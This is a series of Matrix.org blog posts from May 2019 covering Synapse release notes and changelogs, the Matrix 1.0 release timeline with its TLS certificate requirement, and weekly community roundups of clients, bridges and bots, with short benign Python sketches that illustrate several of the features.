Synapse 0.99.5.2 released

30.05.2019 00:00 — Releases, Neil Johnson

0.99.5.2 contains a critical performance fix following a regression that was introduced in 0.99.5. Affected servers will have experienced increased CPU and RAM usage, with a knock-on effect of generally sluggish performance.

Separately, we are also looking into reports relating to further performance degradations that may have been introduced as part of 0.99.5, though consider the 0.99.5.2 fix to be a significant improvement on previous 0.99.5.x releases.

Please upgrade asap.

You can get the new update here or any of the sources mentioned at https://github.com/matrix-org/synapse. Note, Synapse is now available from PyPI, pick it up here. Also, check out our Synapse installation guide page.

🔗Synapse v0.99.5.2 Changelog

🔗Bugfixes

  • Fix bug where we leaked extremities when we soft failed events, leading to performance degradation. (#5274, #5278, #5291)

Final countdown to 1.0

24.05.2019 00:00 — General, Matthew Hodgson

Hi all,

After lots of refinements, polishing and a few distractions we’re finally at the point of announcing the final timeline for both Matrix 1.0 and Synapse 1.0! We are targeting Monday 10th June as our release date - please consider this your two week warning!

This is the end game of the process we began back in February when we released the first stable release of the Server-Server API at FOSDEM, and started the Synapse 0.99 release series to prepare for 1.0.

Matrix 1.0 refers to the upcoming set of API releases which provides a matched set of stable and secure APIs across all of Matrix - at which point the project (at last) exits beta! In practice, this will be Client-Server API 0.5 (including final membership lazy loading, E2E backups and interactive verification and lots more), SS API 0.2 (including server key validity period fixes and associated v5 room protocol) and any other spec updates. The next 2 weeks will see a flurry of spec activity as we get everything together - you can see the full list and track the progress for the CS 0.5 spec release at https://github.com/matrix-org/matrix-doc/projects/2.

Meanwhile, Synapse 1.0 will be the reference implementation of Matrix 1.0, and so makes the changes required to implement Matrix 1.0 and close all currently known security and stability issues and thus exit beta. This means changing the default room protocol version used for new rooms to be v4, which includes the new state resolution algorithm, as well as collision-resistant event IDs, which are now formatted to be URL safe. Support for v4 rooms shipped in Synapse 0.99.5.1, so please upgrade asap to 0.99.5.1 before 1.0 is released to ease the transition. Synapse 1.0 will also ship with support for the upcoming v5 room protocol (which enforces honouring server key validity periods), but this will not be used as the default for new rooms until sufficient servers are speaking Matrix 1.0.
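To make the "URL safe" point concrete, here is a rough Python sketch of how a hash-based event ID can be rendered in the standard and the URL-safe base64 alphabets. It is an illustration under assumptions, not Synapse's code: the real reference hash is taken over a redacted event in canonical JSON, and the helper names below are made up for this example.

```python
import base64
import hashlib
import json


def _digest(event: dict) -> bytes:
    # Simplification (assumption): the real reference hash is computed over
    # the redacted event in canonical JSON. Here we only drop two fields that
    # are not hashed and serialise with sorted keys and no extra whitespace.
    hashed = {k: v for k, v in event.items() if k not in ("signatures", "unsigned")}
    encoded = json.dumps(hashed, sort_keys=True, separators=(",", ":"), ensure_ascii=False)
    return hashlib.sha256(encoded.encode("utf-8")).digest()


def standard_b64_event_id(event: dict) -> str:
    # Unpadded standard base64: may contain '+' and '/', awkward in URLs.
    return "$" + base64.b64encode(_digest(event)).decode("ascii").rstrip("=")


def url_safe_event_id(event: dict) -> str:
    # Unpadded URL-safe base64: uses '-' and '_' instead of '+' and '/'.
    return "$" + base64.urlsafe_b64encode(_digest(event)).decode("ascii").rstrip("=")
```

Because the ID is derived from the event's content rather than chosen by the sending server, two different events cannot share an ID without a hash collision, and the URL-safe alphabet means the ID can be dropped into a request path without extra escaping of `+` or `/`.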

As part of the security work, Matrix 1.0 and Synapse 1.0 also contain a breaking change that requires a valid TLS certificate on the federation API endpoint. Servers that do not configure their certificate will no longer be able to federate post 1.0.

You can check that your server has been correctly configured here and see here for more info on what you need to do. If in doubt head to #synapse:matrix.org.
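For a quick local sanity check, the core of the requirement (a certificate that chains to a trusted CA and matches the hostname) can be sketched in Python with the standard library. This is only an illustration, not how Synapse or the federation tester works: `has_valid_certificate` is a made-up helper, and it assumes your federation traffic is served directly on the given host and port (8448 being the default federation port). If you delegate via .well-known or SRV records, the host and port to test will differ.

```python
import socket
import ssl


def has_valid_certificate(host: str, port: int = 8448, timeout: float = 5.0) -> bool:
    """Return True if host:port completes a TLS handshake with a certificate
    that chains to a trusted CA and matches the hostname."""
    # The default context verifies the certificate chain and the hostname.
    context = ssl.create_default_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with context.wrap_socket(sock, server_hostname=host):
                return True
    except OSError:
        # Covers refused connections, timeouts, DNS failures and TLS errors
        # (ssl.SSLError is a subclass of OSError).
        return False
```

Calling `has_valid_certificate("your.server.name")` on a self-signed or expired certificate returns False, which is roughly the situation a 1.0 server will refuse to federate with.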

We've been tracking readiness for the certificate change at https://arewereadyyet.com. At the time of writing, 68% of active servers on the federation have valid certificates. We would obviously like that number to be higher; however, since the largest installations have upgraded, the total number of users who are ready for 1.0 stands at 96%, which we consider to be high enough to release 1.0.

This is not a drill. From here until 10th June we need everyone to not only ensure that their own server is ready, but also to encourage their fellow admins to update as well. With your help we can get everyone over the line!

Thanks everyone for your help to date, especially those providing support in #synapse:matrix.org.

Onwards!

This Week in Matrix 2019-05-24

24.05.2019 00:00 — This Week in Matrix, Ben Parsons

🔗Matrix Live - Wilko, creator of Pattle 🎙

This week I chatted to Wilko, creator of Pattle.

🔗Dept of Servers 🏢

🔗Synapse

Neil:

Folks, big news this week as we announce that Synapse v1.0 is scheduled for release on 10th June - read all about it here

Aside from that we shipped v0.99.5.1 which (hopefully) is the penultimate release ahead of v1.0. Please, everyone upgrade to v0.99.5.1 because it implements rooms v4 which will be the default room version in Synapse v1.0.

0.99.5.1 also contains experimental support for edits and reactions which are currently hidden behind a Riot labs flag.

🔗Dendrite

Brendan:

Some activity has been happening this week in Dendrite-land, with Brendan adding support for Go modules to the project, and anoa adding SyTest runs to the project’s CI. These were two long-awaited maintenance works that will make working on Dendrite much easier in the future!

🔗Dept of SDKs and Frameworks 🧰

libQMatrixClient (that will soon become libQuotient) 0.5.2 has been released, with the sole purpose of fixing a nasty bug unmarking some direct chats when doing initial sync or a clean-cache start up. Everybody on the 0.5.x branch is advised to upgrade.

🔗Dept of Clients 📱

🔗QMatrixClient to Quotient

kitsune:

The process of renaming QMatrixClient to Quotient has commenced - expect some turbulence while we're transitioning. The place for the repos is at https://github.com/quotient-im. Note that although the library repo name has changed, the old version of the library will continue to be released under the old name (libQMatrixClient), and the library will be renamed only in the master branch. In most cases redirects should bring you home even if you request the old URL (thanks to GitHub); however, people with git repos are strongly advised to update their remotes to new URLs!

In other news:

For platforms that don't have a separate libQMatrixClient package (that is, Windows, macOS, Flatpak and AppImage), Quaternion 0.0.9.4 has been rebuilt with libQMatrixClient 0.5.2 - in the form of Quaternion 0.0.9.4c release.

🔗tangent

tangent is an embeddable HTML client from sanlox:

I added guest login, possibility to disable guest login, possibility to set own message limit on startup and various error messages. Cleaned up the code to make it more consistent and faster. Everything I wanted to have for this tiny embeddable web chat is now there so I'd consider it finished for now.

Check it out at: https://sanlox.dev/tangent/

🔗continuum

yuforia updated their JavaFX client:

minor changes in continuum this week:

  • updated controlsfx to version 11, which has better modularization support
  • sync issue indicator now uses NotificationPane from controlsfx, so now it has slide-in animation when it appears https://matrix.org/_matrix/media/v1/download/matrix.org/VtPORWFqBamfnuJtPtgEXWBs

🔗Neo now has image, video and general file sending

Fox:

Neo now supports sending multiple images, videos and files at once. You'll get a bar with previews, and the option to remove them from the queue/add more.
There's also been a bunch of changes to how events are handled. Images and videos should be much more robust against missing keys (no thumbnail, no information, etc), and there's basic displaying of the most common state events.
I also added an experimental media repository fallback option, which is disabled by default, and only implemented for room avatars. This allows you to provide a list of alternative homeservers Neo is allowed to try when your own homeserver can't load a piece of media.
Due to the loss of lain.haus, I lost admin access in the Neo room, so keep your eyes out for a new one when my infra is back.
I'm currently not really versioning anything, but I do push significant commits to https://neo.lain.haus/neo for people to try. Once it gets to a more useable state, I'll start adopting semantic versioning.
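The media repository fallback Fox describes can be pictured as building one download URL per candidate homeserver for the same piece of media and trying them in order. The Python sketch below is an assumption-laden illustration, not Neo's code: `candidate_download_urls` is a hypothetical helper, and it assumes the r0 media download path.

```python
from typing import List
from urllib.parse import quote


def candidate_download_urls(mxc_uri: str, homeservers: List[str]) -> List[str]:
    """Build one download URL per homeserver for a given mxc:// URI."""
    prefix = "mxc://"
    if not mxc_uri.startswith(prefix):
        raise ValueError("not an mxc:// URI: %r" % (mxc_uri,))
    # mxc://<origin server>/<media id>
    origin, _, media_id = mxc_uri[len(prefix):].partition("/")
    if not origin or not media_id:
        raise ValueError("malformed mxc:// URI: %r" % (mxc_uri,))
    path = "/_matrix/media/r0/download/%s/%s" % (
        quote(origin, safe=":"),
        quote(media_id, safe=""),
    )
    # The first entry would normally be your own homeserver, followed by
    # the alternatives the client is allowed to try.
    return [hs.rstrip("/") + path for hs in homeservers]
```

A client would request each URL in turn and stop at the first one that returns the media, which is why an explicit allow-list of fallback servers matters: every server you try learns which media you asked for.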

🔗Spectral update

Black Hat:

You can now paste images from the clipboard in Spectral. It is also possible to change room name and topic in room settings. A new release is pushed to Flathub to address direct room issues. Also there've been discussions about implementing custom room themes and backgrounds.

🔗Riot Web

  • Continued work on reactions and edits
  • New emoji font added to standardise emoji appearance and assist OS / browser combinations that don’t support emoji by default

🔗Riot Mobile

  • Continued work on reactions and edits
  • Riot-iOS has a new actions menu on events
  • Fix registration with an email

🔗Riot and RiotX available from F-Droid

krombel updated their Riot(X) F-Droid repos:

I finally found some time to update my fdroid repos which provide the development builds of riot and riotx. Now the builds of buildkite are part of the repos.
There are now 4 separate repos: One for each app and flavor. You can have a look at https://fdroid.krombel.de to find out the URL for the version you want to use.

Riot-dev (F-Droid; Repo; Build-Source)
    https://fdroid.krombel.de/riot-dev-fdroid
    https://fdroid.krombel.de/riot-dev-fdroid/fdroid/repo
    Fingerprint: 312E07B9444D0D1B615EBBAAC55EA4E5A54E123C3BEFCCA5D18B5E12DFC95BDC

Riot-dev (GPlay; Repo; Build-Source)
    https://fdroid.krombel.de/riot-dev-gplay
    https://fdroid.krombel.de/riot-dev-gplay/fdroid/repo
    Fingerprint: 81EDF1741A51B944B00B55E307C7AA043623CB646599182A104B895B6B319844

RiotX-dev (F-Droid; Repo; Build-Source)
    https://fdroid.krombel.de/riotx-dev-fdroid
    https://fdroid.krombel.de/riotx-dev-fdroid/fdroid/repo
    Fingerprint: FD146EF30FA9F8F075BDCD9F02F069D22061B1DF7CC90E90821750A7184BF53D

RiotX-dev (GPlay; Repo; Build-Source)
    https://fdroid.krombel.de/riotx-dev-gplay
    https://fdroid.krombel.de/riotx-dev-gplay/fdroid/repo
    Fingerprint: 5564AB4D4BF9461AF7955449246F12D7E792A8D65165EBB2C0E90E65E77D5095

🔗Dept of Bridges 🌉

🔗Major WhatsApp bridging update

tulir made great strides on mautrix-whatsapp this week:

I've been working on mautrix-whatsapp to add history bridging and Matrix puppeting.

  • New portals are populated with some history when creating them (exact count is configurable)
  • All messages missed during bridge downtime are backfilled
  • Creating portals is smarter now:
  • When logging in initially, it'll create portals for a few recent chats (count configurable).
  • It'll create portals when there are incoming messages as before, but it should no longer create portals for chats that only have old messages.
  • The missed message backfilling creates portals when necessary.

Matrix puppeting isn't quite finished yet. It can already use your Matrix account to bridge messages sent from whatsapp mobile, but it doesn't use the account to bridge EDUs (typing notifs, presence, read receipts) yet.

To make the history bridging a bit nicer, I made a PR to fix timestamp massaging in synapse: https://github.com/matrix-org/synapse/pull/5233. Timestamp massaging was removed from the spec in 1.0, but it wasn't intentionally removed from synapse, it just broke due to other changes. It was probably supposed to stay there as an easter egg until there's a proper solution for bridging history.
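For readers who haven't met timestamp massaging: the idea is that an application service sending an event on behalf of a bridged user can ask the homeserver to record the original timestamp instead of "now". A minimal Python sketch of building such a request URL follows. The `ts` query parameter and the r0 send path are my assumptions about how the feature is exposed, `send_url_with_timestamp` is a hypothetical helper, and the homeserver would only honour the parameter for application service tokens.

```python
from urllib.parse import quote, urlencode


def send_url_with_timestamp(
    homeserver: str, room_id: str, event_type: str, txn_id: str, origin_ts_ms: int
) -> str:
    """Build a send-event URL that carries the original message timestamp."""
    path = "/_matrix/client/r0/rooms/%s/send/%s/%s" % (
        quote(room_id, safe=""),
        quote(event_type, safe=""),
        quote(txn_id, safe=""),
    )
    # Assumption: the massaged timestamp (milliseconds since the epoch) is
    # passed as a `ts` query parameter.
    return homeserver.rstrip("/") + path + "?" + urlencode({"ts": origin_ts_ms})
```

With something like this, backfilled WhatsApp history shows up in the room with the dates the messages were originally sent rather than the time the bridge replayed them.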

🔗Dept of Ops 🛠

Ananace pushed updated K8s images for Synapse 0.99.5

Bubu updated synapse on Arch:

Archlinux updated to synapse 0.99.5 as well after the requests, urllib3 incompatibility thing was sorted out.

Mathijs updated the synapse avhost docker image:

With synapse v0.99.5.1 the avhost docker image has finally moved to python 3

🔗Dept of Services 🚀

🔗Modular

New widget for Scalar: EtherCalc.

🔗Dept of Bots 🤖

🔗QuatBot

Very very new, let's take a look at QuatBot, which uses libQuotient:

QuatBot is a simple meeting-management bot for use with the Matrix. Taking turns during an online meeting -- and making sure everyone gets to have their say -- takes a bit of organizing, and this bot helps you do that. QuatBot runs as a command-line application.

🔗Dept of Articles 📝

uhoreg wrote a really informative article about key verification:

For those who want to know more about the security behind emoji-based key verification, I've written a blog post about it: https://www.uhoreg.ca/blog/20190514-1146

🔗Dept of GSOC 🎓

🔗GSoC 2019 – Reliable Bridges

Thanks Kai for this introduction to his project:

The Reliable Bridges GSoC project is about implementing a feedback mechanism for the Matrix network in cases where bridges are not able to properly handle messages. Currently clients are unable to know if a message was successfully sent over a bridge. With the new mechanism in place they get the information about errors happening at bridges and can behave accordingly by e.g. notifying the user of the failed delivery.

The implementation is foremost focused on the matrix-appservice-discord bridge which uses the underlying matrix-appservice-bridge. A JS bridge was chosen so that as much code as possible is brought into the SDK and other bridges can profit sooner from the work done.

The first step for implementing the new feature will be the signaling of permanent errors occurring at the bridge (in contrast to temporary failures). They might occur e.g. when the sending account was banned on the bridged foreign network. These permanent errors will be implemented as a new type of PDU originating from the bridge.

After permanent errors are done, the subsequent weeks will see work on temporary failures which might include work on Synapse as well as work on Riot Web to have a client which actually uses the new events. As these events are new features being introduced there will also be a MSC draft. There everyone can check out the proposed solution and tear it apart with their criticism (if applicable 😉).

For discussions related to the GSoC project, or if you have opinions on what the MSC should look like, you are invited to join the Reliable Bridges Matrix room.

🔗That's all I know 🏁

Finally Alan, friend of Matrix and creator of TADHack and TADSummit is doing an "Open Source Telecom Software Survey" - if you could add value to this research by completing it please do so here: http://alanquayle.com/2019/05/open-source-telecom-software-project-survey/

See you next week, and be sure to stop by #twim:matrix.org with your updates!

Synapse 0.99.5.1 released!

21.05.2019 00:00 — Releases, Neil Johnson

Okay folks, this is an important one. v0.99.5.1 will be the last release before we ship Synapse v1.0. It is really important that you upgrade to v0.99.5.1 because it implements rooms version 4 - which is the room version that Synapse 1.0 will default to.

This means that Synapse 1.0 servers will create new rooms as version 4 by default and servers that have not upgraded to at least v0.99.5.1 will not be able to join those rooms.

Over the coming days we will announce a release day for Synapse v1.0. The idea is to give admins 2 weeks' notice so that anyone yet to configure their federation SSL certificate has time to do so. This is important: failure to configure your certs will mean not being able to federate with v1.0 servers. If you are not sure whether your certs are valid, you can test here and read here for more info on what to do.

Aside from room v4, this release also includes the ability to blacklist specific IPs from federating as well as experimental support for edits and reactions. We are not quite ready to mark the feature 'done done', but it is very close. Watch out for news as the feature lands properly.

We're really close to v1.0 now, give us a few more days and we'll announce an official release date.

As ever, you can get the new update here or any of the sources mentioned at https://github.com/matrix-org/synapse. Note, Synapse is now available from PyPI, pick it up here. Also, check out our Synapse installation guide page.

🔗Synapse v0.99.5.1 Changelog (since v0.99.4)

🔗Features

  • Add ability to blacklist IP ranges for the federation client. (#5043)
  • Ratelimiting configuration for clients sending messages and the federation server has been altered to match login ratelimiting. The old configuration names will continue working. Check the sample config for details of the new names. (#5181)
  • Drop support for the undocumented /_matrix/client/v2_alpha API prefix. (#5190)
  • Add an option to disable per-room profiles. (#5196)
  • Stick an expiration date to any registered user missing one at startup if account validity is enabled. (#5204)
  • Add experimental support for relations (aka reactions and edits). (#5209, #5211, #5203, #5212)
  • Add a room version 4 which uses a new event ID format, as per MSC2002. (#5210, #5217)
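The ratelimiting item above is easier to picture with a small model. The Python sketch below is a generic token-bucket limiter, not Synapse's implementation; `per_second` and `burst_count` are what I understand the login ratelimiting options to be called, so treat those names as assumptions and check the sample config for the real ones.

```python
from typing import Dict, Tuple


class SimpleRatelimiter:
    """Token bucket: `burst_count` actions at once, refilled at `per_second`."""

    def __init__(self, per_second: float, burst_count: int) -> None:
        self.per_second = per_second
        self.burst_count = burst_count
        # key -> (tokens left, time the bucket was last updated, in seconds)
        self._state: Dict[str, Tuple[float, float]] = {}

    def allow(self, key: str, now_s: float) -> bool:
        tokens, last_s = self._state.get(key, (float(self.burst_count), now_s))
        # Refill for the time that has passed, capped at the burst size.
        tokens = min(float(self.burst_count), tokens + (now_s - last_s) * self.per_second)
        allowed = tokens >= 1.0
        if allowed:
            tokens -= 1.0
        self._state[key] = (tokens, now_s)
        return allowed
```

With `SimpleRatelimiter(per_second=0.5, burst_count=3)`, a client can send three messages back to back, is refused on the fourth, and regains one message's worth of budget every two seconds.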

🔗Bugfixes

  • Fix image orientation when generating thumbnails (needs pillow>=4.3.0). Contributed by Pau Rodriguez-Estivill. (#5039)
  • Exclude soft-failed events from forward-extremity candidates: fixes "No forward extremities left!" error. (#5146)
  • Re-order stages in registration flows such that msisdn and email verification are done last. (#5174)
  • Fix 3pid guest invites. (#5177)
  • Fix a bug where the register endpoint would fail with M_THREEPID_IN_USE instead of returning an account previously registered in the same session. (#5187)
  • Prevent registration for user ids that are too long to fit into a state key. Contributed by Reid Anderson. (#5198)
  • Fix incompatibility between ACME support and Python 3.5.2. (#5218)
  • Fix error handling for rooms whose versions are unknown. (#5219)

🔗Internal Changes

  • Make /sync attempt to return device updates for both joined and invited users. Note that this doesn't currently work correctly due to other bugs. (#3484)
  • Update tests to consistently be configured via the same code that is used when loading from configuration files. (#5171, #5185)
  • Allow client event serialization to be async. (#5183)
  • Expose DataStore._get_events as get_events_as_list. (#5184)
  • Make generating SQL bounds for pagination generic. (#5191)
  • Stop telling people to install the optional dependencies by default. (#5197)

This Week in Matrix 2019-05-17

17.05.2019 00:00 — This Week in Matrix, Ben Parsons

🔗Matrix Live - Reactions and Edits coming to Matrix

If you've been chatting on Matrix this week, you'll have noticed some new features rolling out.

In Riot develop, hit Labs in the Settings menu and you'll be able to try out the new Reactions and message editing features.

🔗Dept of Servers

🔗Synapse

Neil said:

This week we shipped 0.99.4 - no stand out ‘oh my gosh’ headlines, just lots of bug fixes and perf improvements - get involved. We’ve also been working hard on getting things like reactions and edits going, as well as more prep for improving perf for small server instances.

🔗Construct

First Construct update for a few weeks:

Construct has added a server command line available in any room when starting a line with a special character (by default it's '\'). The commands are private so the room doesn't actually see it. More on this next week, or check out #test:zemos.net.

🔗Dept of SDKs and Frameworks

🔗Ruby SDK now 1.0!

Big news from Ananace this week:

Finished getting the test coverage to a reasonable enough percentage to feel comfortable releasing the Ruby Matrix SDK as a nice and stable 1.0 (.0)

This is great! All Rubyists should check it out. Ananace notes:

I still need to set up fixtures for all the API endpoints I'm exposing so I can verify every single API call as well, but I see that as a later thing as that relates mostly to how the other side (the HS) handles my input, not to how the SDK itself handles said input

🔗Dept of Clients

🔗Pattle

Wilko:

A new version of Pattle is available on F-droid!

Changes include:

  • Implement direct chats correctly!
    • Use user avatar as chat avatar if direct
    • Hide user name in direct chat
  • Use names of room members if no room name is set (whether the chat is direct or not)
  • Add border to left of replied-to messages to easily differentiate them
  • Show redaction events!
  • Use icons instead of letters if chat has no avatar
    • Use different icons for direct chats than group chats (and in the future public chats)
  • Use user color for direct chats if the user has no avatar
  • Simplify member change messages ('Pat has joined' -> 'Pat joined', etc)
  • Tweak font sizes (thanks to Mathieu Velten)!
  • Change date header style (smaller and full caps)

Development happens here and development discussion happens here: #pattle:matrix.org!

To install this release, add the following repo in F-droid:

https://fdroid.pattle.im/?fingerprint=E91F63CA6AE04F8E7EA53E52242EAF8779559209B8A342F152F9E7265E3EA729

And install 'Pattle'.

🔗Riot (various)

This week the various Riot teams (web, iOS, Android) have been spending time implementing reactions/edits, but also:

🔗Riot Android

  • PR review from community: Matomo SDK will replace Piwik SDK
  • Weblate is up again, a sync has been done.

🔗RiotX (Android)

  • Crypto integration is still ongoing
  • Reactions are coming soon!
  • New home and navigation to rooms development started

🔗tangent

tangent is an exciting young project designed to create a very lightweight browser-based new client. sanlox:

did a lot of changes on tangent to make it more stable and performant, only registration and guest login are left to do, git changed to https://gitlab.com/sanlox/tangent

Test the latest at: https://sanlox.dev/tangent/

🔗Spectral timeline UI and more

Black Hat:

  • Polished the timeline UI for Spectral.
  • Added m.video support.
  • Also added drag-and-drop support in Spectral.

🔗Fractal now with keyboard shortcuts

Alexandre Franke:

Ana, first time contributor, added a bunch of cool keyboard shortcuts to ease navigation in Fractal. One can now e.g. go down to the next room with unread messages with ctrl+shift+page down.

🔗continuum updates

yuforia:

  • Load message history from server lazily when scrolling
  • Loaded messages are always saved to disk, so if you aren't offline for too long, only a few messages will need to be fetched the next time you login
  • The screenshot also shows the UI for handling invitations

🔗early-day reactions support in Quaternion

kitsune:

This week was too packed IRL but I took an hour to experiment with reactions that are a rage in riot.im/develop these days. An experimental "kitsune-reactions" branch understands reaction events and allows clients to further process them. A proof-of-concept in Quaternion will land over the weekend.

🔗Scylla

via Aaron Raimist:

Update on Scylla from VaNilLa: Though I am very busy with schoolwork, I found time to fix a long-standing issue: the names of private messages showing up as <No Name>. This is gone now, and rooms are sorted alphabetically to make it easier to navigate.
Try Scylla here: https://scylla.danilafe.com
Come join us in #scylla:riot.danilafe.com to discuss

🔗Dept of Bridges

🔗matrix-appservice-discord 0.5.0

Half-Shot:

Evening, we've just cut the first RC of matrix-appservice-discord 0.5.0. Most of the changes this time around are bugfixes to formatting, internal re-architecturing / performance boosts and shifting more things to the database. Please help test if you run an instance, so we can get a 0.5.0 out swiftly. The next release has a lot of features planned for it 😉

Also - congratulations to Half-Shot on finishing all his final-year exams! How will you fill your time now?

🔗mautrix-telegram/mautrix-hangouts/mautrix-facebook/mautrix-whatsapp

Think tulir's been busy this week?

Lots of small changes in my projects:

  • mautrix-telegram had a bunch of bugs fixed, like multiline messages from some clients not being bridged correctly.
  • mautrix-hangouts got matrix->hangouts image bridging and some bugfixes.
  • mautrix-facebook also got some bugfixes.
  • mautrix-whatsapp now informs the user about connection problems rather than crashing and has commands to try to reconnect. It also now bridges redactions in both directions.

🔗Dept of Ops

🔗kubernetes from Ananace

Ananace updated their k8s packaging for Synapse to 0.99.4: https://github.com/ananace/matrix-synapse

🔗Debian Packages

andrewsh announced the Debian Matrix Packagers Team has its own dedicated blog

for everything about Matrix on Debian, join #debian-matrix:matrix.org

🔗silvio/avhost synapse docker container

Mathijs:

the silvio/avhost synapse docker container is making progress in moving to python 3, the container is made smaller and no longer runs synapse as root

There are some important differences between this and https://github.com/matrix-org/synapse/tree/master/contrib/docker:

it puts all the configuration files, logfiles and media files in the volume, you don't really configure it with environmental variables but just by editing the homeserver.yaml file in the volume, and it also contains coturn

🔗Dept of Bots

Half-Shot created a "reactbot":

Hot on the heels of the rapid developments of the reaction work, I've written a bot that automatically reacts when spotting certain phrases inside rooms. Honestly I have no idea what the use case is for this, but it exists and I currently use it to stick the :dog: reaction on every dog related event. https://github.com/Half-Shot/matrix-reactbot

The bot is also now used in #twim:matrix.org, where it performs the needed work of adding red circles to submissions.
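A bot of this kind boils down to two steps: spot a phrase, then send a reaction pointing at the matching event. The Python sketch below illustrates both under assumptions. It is not the matrix-reactbot code, the rule table is made up, and the `m.relates_to` shape (an `m.annotation` relation sent as an `m.reaction` event) is how I understand the experimental relations support.

```python
import re
from typing import Dict, Optional, Pattern

# Hypothetical rule table: phrase pattern -> reaction key.
RULES: Dict[Pattern[str], str] = {
    re.compile(r"\b(dog|puppy)\b", re.IGNORECASE): "🐶",
}


def reaction_for(body: str) -> Optional[str]:
    """Return the reaction key for the first rule matching the message body."""
    for pattern, key in RULES.items():
        if pattern.search(body):
            return key
    return None


def build_reaction_content(target_event_id: str, key: str) -> dict:
    """Content for an `m.reaction` event annotating `target_event_id`."""
    return {
        "m.relates_to": {
            "rel_type": "m.annotation",
            "event_id": target_event_id,
            "key": key,
        }
    }
```

The bot would call `reaction_for` on each incoming message body and, when it returns a key, send the content from `build_reaction_content` into the same room.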

tulir's karma maubot now also supports reactions and redactions, and the maubot sed plugin now underlines changes in messages.

🔗Dept of Status of Matrix

🔗t2bot.io has launched a new website

TravisR:

t2bot.io has launched a new website, surpassed a milestone of 300k total bridged users (70k of those are active monthly), and launched 2 new early-beta-quality bridges. If you're looking to try out tulir's latest Hangouts or Facebook Messenger bridge then t2bot.io is an option for that, assuming you don't mind the occasional bug, missing feature, or problem. Check out https://t2bot.io/hangouts/ and https://t2bot.io/messenger/ for setup instructions.

🔗That's all I know

See you next week, and be sure to stop by #twim:matrix.org with your updates!

PS Massive thanks to Aaron Raimist for doing the needful to make full articles appear in RSS!

Synapse 0.99.4 released!

15.05.2019 00:00 — Releases, Neil Johnson

Hey ho Synapse release day.

0.99.4 is a maintenance release collecting together all of the bug fixes and performance improvements over the past few weeks, additionally there is further support for the upcoming 1.0 release (more info coming soon). One thing worth calling out is how many community contributions have made their way into 0.99.4, take a look at the change log for details, but many thanks to everyone submitting PRs, keep them coming!

As ever, you can get the new update here or any of the sources mentioned at https://github.com/matrix-org/synapse. Note, Synapse is now available from PyPI, pick it up here. Also, check out our Synapse installation guide page.

🔗Synapse 0.99.4 Changelog

🔗Features

  • Add systemd-python to the optional dependencies to enable logging to the systemd journal. Install with pip install matrix-synapse[systemd]. (#4339)
  • Add a default .m.rule.tombstone push rule. (#4867)
  • Add ability for password provider modules to bind email addresses to users upon registration. (#4947)
  • Implementation of MSC1711 including config options for requiring valid TLS certificates for federation traffic, the ability to disable TLS validation for specific domains, and the ability to specify your own list of CA certificates. (#4967)
  • Remove presence list support as per MSC 1819. (#4989)
  • Reduce CPU usage starting pushers during start up. (#4991)
  • Add a delete group admin API. (#5002)
  • Add config option to block users from looking up 3PIDs. (#5010)
  • Add context to phonehome stats. (#5020)
  • Configure the example systemd units to have a log identifier of matrix-synapse instead of the executable name, python. Contributed by Christoph Müller. (#5023)
  • Add time-based account expiration. (#5027, #5047, #5073, #5116)
  • Add support for handling /versions, /voip and /push_rules client endpoints to client_reader worker. (#5063, #5065, #5070)
  • Add a configuration option to require authentication on /publicRooms and /profile endpoints. (#5083)
  • Move admin APIs to /_synapse/admin/v1. (The old paths are retained for backwards-compatibility, for now). (#5119)
  • Implement an admin API for sending server notices. Many thanks to @krombel who provided a foundation for this work. (#5121, #5142)

🔗Bugfixes

  • Avoid redundant URL encoding of redirect URL for SSO login in the fallback login page. Fixes a regression introduced in #4220. Contributed by Marcel Fabian Krüger ("zaugin"). (#4555)
  • Fix bug where presence updates were sent to all servers in a room when a new server joined, rather than to just the new server. (#4942, #5103)
  • Fix sync bug which made accepting invites unreliable in worker-mode synapses. (#4955, #4956)
  • start.sh: Fix the --no-rate-limit option for messages and make it bypass rate limit on registration and login too. (#4981)
  • Transfer related groups on room upgrade. (#4990)
  • Prevent the ability to kick users from a room they aren't in. (#4999)
  • Fix issue #4596 so synapse_port_db script works with --curses option on Python 3. Contributed by Anders Jensen-Waud. (#5003)
  • Clients timing out/disappearing while downloading from the media repository will now no longer log a spurious "Producer was not unregistered" message. (#5009)
  • Fix "cannot import name execute_batch" error with postgres. (#5032)
  • Fix disappearing exceptions in manhole. (#5035)
  • Workaround bug in twisted where attempting too many concurrent DNS requests could cause it to hang due to running out of file descriptors. (#5037)
  • Make sure we're not registering the same 3pid twice on registration. (#5071)
  • Don't crash on lack of expiry templates. (#5077)
  • Fix the ratelimiting on third party invites. (#5104)
  • Add some missing limitations to room alias creation. (#5124, #5128)
  • Limit the number of EDUs in transactions to 100 as expected by synapse. Thanks to @superboum for this work! (#5138)
  • Fix bogus imports in unit tests. (#5154)
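The EDU limit in the bugfix list above amounts to never putting more than 100 EDUs into a single federation transaction. A minimal Python sketch of that batching idea follows. It is a generic illustration, not Synapse's transaction queue, and `batch_edus` is a hypothetical helper.

```python
from typing import Iterator, List, Sequence

# Limit named in the changelog entry above.
MAX_EDUS_PER_TRANSACTION = 100


def batch_edus(
    pending: Sequence[dict], limit: int = MAX_EDUS_PER_TRANSACTION
) -> Iterator[List[dict]]:
    """Yield successive batches of at most `limit` EDUs, preserving order."""
    if limit < 1:
        raise ValueError("limit must be at least 1")
    for start in range(0, len(pending), limit):
        yield list(pending[start:start + limit])
```

A sender with 250 queued EDUs would therefore need three transactions to the same destination (100, 100 and 50) rather than one oversized transaction that the receiving server may reject.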

🔗Internal Changes

  • Add test to verify threepid auth check added in #4435. (#4474)
  • Fix/improve some docstrings in the replication code. (#4949)
  • Split synapse.replication.tcp.streams into smaller files. (#4953)
  • Refactor replication row generation/parsing. (#4954)
  • Run black to clean up formatting on synapse/storage/roommember.py and synapse/storage/events.py. (#4959)
  • Remove log line for password via the admin API. (#4965)
  • Fix typo in TLS filenames in docker/README.md. Also add the '-p' commandline option to the 'docker run' example. Contributed by Jurrie Overgoor. (#4968)
  • Refactor room version definitions. (#4969)
  • Reduce log level of .well-known/matrix/client responses. (#4972)
  • Add config.signing_key_path that can be read by synapse.config utility. (#4974)
  • Track which identity server is used when binding a threepid and use that for unbinding, as per MSC1915. (#4982)
  • Rewrite KeyringTestCase as a HomeserverTestCase. (#4985)
  • README updates: Corrected the default POSTGRES_USER. Added port forwarding hint in TLS section. (#4987)
  • Remove a number of unused tables from the database schema. (#4992, #5028, #5033)
  • Run black on the remainder of synapse/storage/. (#4996)
  • Fix grammar in get_current_users_in_room and give it a docstring. (#4998)
